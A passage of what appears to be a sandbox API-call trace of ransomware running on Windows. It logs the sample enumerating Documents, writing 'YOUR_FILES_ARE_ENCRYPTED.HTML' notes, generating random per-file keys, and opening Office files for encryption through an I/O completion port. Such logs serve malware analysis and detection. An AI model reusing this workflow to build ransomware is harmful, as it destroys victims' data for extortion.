(HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.857] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CA") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="B4") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="57") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="B9") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="22") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="86") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="24") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="20") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8E") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="8B") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="CE") returned 2 [0166.857] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="4F") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="24") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="93") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="21") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F5") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3A") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="30") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="AB") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="9F") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="81") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B4") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="94") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="40") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="7F") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="36") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="A0") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="53") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E3") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="85") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E6") returned 2 [0166.858] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="75") returned 2 [0166.859] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\zQmD5wp.ppt" [0166.859] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.859] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.870] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb68548c0, ftCreationTime.dwHighDateTime=0x1d7e051, ftLastAccessTime.dwLowDateTime=0xea371f30, ftLastAccessTime.dwHighDateTime=0x1d7e160, ftLastWriteTime.dwLowDateTime=0xea371f30, ftLastWriteTime.dwHighDateTime=0x1d7e160, nFileSizeHigh=0x0, nFileSizeLow=0x85f3, dwReserved0=0x1d2cfb2, dwReserved1=0x0, cFileName="zQmD5wp.ppt", cAlternateFileName="")) returned 0 [0166.870] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0166.871] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0166.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\cXn1G6nnkt\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\documents\\cxn1g6nnkt\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0166.871] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0166.874] CloseHandle (hObject=0x5ac) returned 1 [0166.874] GetProcessHeap () returned 0x270000 [0166.875] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.875] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd2428b10, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2428b10, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd5ba6bf0, ftLastWriteTime.dwHighDateTime=0x1d70517, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0166.875] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\desktop.ini") returned 45 [0166.875] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.875] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.875] lstrlenW (lpString=".ini") returned 4 [0166.875] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0166.875] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5179ccc0, ftCreationTime.dwHighDateTime=0x1d7b0cd, ftLastAccessTime.dwLowDateTime=0xc85c0400, ftLastAccessTime.dwHighDateTime=0x1d7e4eb, ftLastWriteTime.dwLowDateTime=0xc85c0400, ftLastWriteTime.dwHighDateTime=0x1d7e4eb, nFileSizeHigh=0x0, nFileSizeLow=0xb2a7, dwReserved0=0x0, dwReserved1=0x60, cFileName="JLPz-3BpYDFP5A 5Ko1l.xlsx", cAlternateFileName="JLPZ-3~1.XLS")) returned 1 [0166.875] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx") returned 59 [0166.875] lstrcmpW (lpString1="JLPz-3BpYDFP5A 5Ko1l.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.875] PathFindExtensionW (pszPath="JLPz-3BpYDFP5A 5Ko1l.xlsx") returned=".xlsx" [0166.875] lstrlenW (lpString=".xlsx") returned 5 [0166.875] PathFindExtensionW (pszPath="JLPz-3BpYDFP5A 5Ko1l.xlsx") returned=".xlsx" [0166.875] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.875] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\jlpz-3bpydfp5a 5ko1l.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.876] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=45735) returned 1 [0166.876] GetProcessHeap () returned 0x270000 [0166.876] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.877] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="B0") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="98") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="6A") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="C7") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="44") returned 2 [0166.877] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A5") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="48") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="A5") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E9") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="83") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="29") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="18") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="01") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="FE") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="83") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="A4") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="64") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="76") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="ED") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="8B") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="6A") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="52") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="D9") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="F1") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="38") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="8C") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="AA") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="E1") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="FF") returned 2 [0166.878] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="CB") returned 2 [0166.879] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="E6") returned 2 [0166.879] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="42") returned 2 [0166.879] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\JLPz-3BpYDFP5A 5Ko1l.xlsx" [0166.879] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.879] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.890] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de91a30, ftCreationTime.dwHighDateTime=0x1d7bdc5, ftLastAccessTime.dwLowDateTime=0xce4f9670, ftLastAccessTime.dwHighDateTime=0x1d7c5af, ftLastWriteTime.dwLowDateTime=0xce4f9670, ftLastWriteTime.dwHighDateTime=0x1d7c5af, nFileSizeHigh=0x0, nFileSizeLow=0x81fa, dwReserved0=0x0, dwReserved1=0x60, cFileName="jQGEIUWp.docx", cAlternateFileName="JQGEIU~1.DOC")) returned 1 [0166.890] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx") returned 47 [0166.890] lstrcmpW (lpString1="jQGEIUWp.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.890] PathFindExtensionW (pszPath="jQGEIUWp.docx") returned=".docx" [0166.890] lstrlenW (lpString=".docx") returned 5 [0166.890] PathFindExtensionW (pszPath="jQGEIUWp.docx") returned=".docx" [0166.890] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.891] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\jqgeiuwp.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.891] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=33274) returned 1 [0166.891] GetProcessHeap () returned 0x270000 [0166.891] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.892] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="17") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="18") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="6F") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="2B") returned 2 [0166.892] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="95") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A5") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="5A") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="CB") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="28") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="CB") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B4") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F3") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="C6") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="6D") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="94") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="64") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="9F") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="5D") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="9D") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="CA") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="04") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D3") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="11") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="2C") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="12") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="65") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="28") returned 2 [0166.893] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="02") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="0D") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="0C") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="61") returned 2 [0166.894] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7D") returned 2 [0166.894] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\jQGEIUWp.docx" [0166.894] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.895] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.905] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2767860, ftCreationTime.dwHighDateTime=0x1d7b341, ftLastAccessTime.dwLowDateTime=0xadb434c0, ftLastAccessTime.dwHighDateTime=0x1d7d7c0, ftLastWriteTime.dwLowDateTime=0xadb434c0, ftLastWriteTime.dwHighDateTime=0x1d7d7c0, nFileSizeHigh=0x0, nFileSizeLow=0x1ddb, dwReserved0=0x0, dwReserved1=0x60, cFileName="K08Bqm1udfoCJ.pptx", cAlternateFileName="K08BQM~1.PPT")) returned 1 [0166.905] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx") returned 52 [0166.905] lstrcmpW (lpString1="K08Bqm1udfoCJ.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.905] PathFindExtensionW (pszPath="K08Bqm1udfoCJ.pptx") returned=".pptx" [0166.905] lstrlenW (lpString=".pptx") returned 5 [0166.905] PathFindExtensionW (pszPath="K08Bqm1udfoCJ.pptx") returned=".pptx" [0166.905] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.906] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\k08bqm1udfocj.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.906] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=7643) returned 1 [0166.906] GetProcessHeap () returned 0x270000 [0166.906] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.907] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="91") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="22") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="5E") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="8E") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="CE") returned 2 [0166.907] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="32") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="95") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="BE") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="C1") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="FF") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="D1") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="B7") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="D2") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="93") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="45") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="3C") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="81") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="5B") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A8") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="79") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="D3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="B0") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="42") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="90") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="D5") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="A3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="A3") returned 2 [0166.908] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="43") returned 2 [0166.909] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="6C") returned 2 [0166.909] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="8E") returned 2 [0166.909] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="77") returned 2 [0166.909] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\K08Bqm1udfoCJ.pptx" [0166.909] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.910] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.924] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c8da280, ftCreationTime.dwHighDateTime=0x1d77e43, ftLastAccessTime.dwLowDateTime=0xd2562db0, ftLastAccessTime.dwHighDateTime=0x1d7d9ff, ftLastWriteTime.dwLowDateTime=0xd2562db0, ftLastWriteTime.dwHighDateTime=0x1d7d9ff, nFileSizeHigh=0x0, nFileSizeLow=0xab0e, dwReserved0=0x0, dwReserved1=0x60, cFileName="KfOTPMS8Hg.xlsx", cAlternateFileName="KFOTPM~1.XLS")) returned 1 [0166.925] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx") returned 49 [0166.925] lstrcmpW (lpString1="KfOTPMS8Hg.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.925] PathFindExtensionW (pszPath="KfOTPMS8Hg.xlsx") returned=".xlsx" [0166.925] lstrlenW (lpString=".xlsx") returned 5 [0166.925] PathFindExtensionW (pszPath="KfOTPMS8Hg.xlsx") returned=".xlsx" [0166.925] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0166.925] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\kfotpms8hg.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0166.926] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=43790) returned 1 [0166.926] GetProcessHeap () returned 0x270000 [0166.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0166.927] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="72") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="DD") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="56") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="B2") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="1B") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="1D") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="68") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="69") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="E4") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="9A") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="0A") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="77") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="4E") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="11") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="F9") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F9") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="F9") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="29") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="78") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A0") returned 2 [0166.927] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: 